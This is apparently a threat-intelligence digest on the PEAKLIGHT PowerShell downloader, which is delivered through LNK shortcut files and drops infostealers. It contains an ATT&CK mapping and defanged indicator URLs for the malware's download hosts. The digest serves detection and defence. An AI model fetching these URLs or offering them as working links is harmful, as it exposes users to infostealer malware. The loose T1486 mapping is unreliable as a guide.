PEAKLIGHT is an obfuscated PowerShell downloader identified by Mandiant that delivers malware-as-a-service infostealers through Microsoft Shortcut Files. It utilizes a JavaScript dropper hosted on a CDN to execute malicious payloads, including LummaC2, HijackLoader, and CryptBot. The campaign highlights the use of legitimate tools for malware delivery while evading detection. Affected: Microsoft Shortcut Files, PowerShell, AutoIt
Keypoints :
- PEAKLIGHT is a PowerShell-based downloader delivering infostealers.
- Initial infection vector is a Microsoft Shortcut File (LNK).
- The downloader executes a PowerShell script that fetches malicious payloads.
- Payloads include LummaC2, HijackLoader, and CryptBot.
- Utilizes obfuscation techniques to evade detection.
- JavaScript dropper is hosted on a content delivery network (CDN).
- Employs mshta.exe to execute scripts and download additional payloads.
- Malware analysis reveals complex obfuscation and encryption methods.
- Campaign demonstrates the misuse of legitimate tools for malicious purposes.
MITRE Techniques :
- T1203 – Exploitation for Client Execution: Utilizes Microsoft Shortcut Files to exploit vulnerabilities.
- T1059.001 – Command and Scripting Interpreter: PowerShell is used to execute scripts and commands.
- T1071.001 – Application Layer Protocol: Communication with remote servers via HTTP/HTTPS.
- T1486 – Data Encrypted for Impact: Encrypted payloads are used to obfuscate malicious actions.
- T1105 – Ingress Tool Transfer: Downloads additional payloads from remote servers.
Indicator of Compromise :
- [url] hxxp://download.wsconnect[.]org/Downloads/Instruction_1928_W9COI.pdf.lnk
- [url] hxxp://download.wsconnect[.]org/Downloads/Agreement%20for%20YouTube%20cooperation.pdf.lnk
- [url] hxxps://docu-sign[.]info/api/uz/0912545164/update.bin
- [url] hxxps://docu-sign[.]info/api/uz/0912545164/config.bin
- Check the article for all found IoCs.
Full Research: https://medium.com/trac-labs/peaklight-illuminating-the-shadows-02a1bb44885c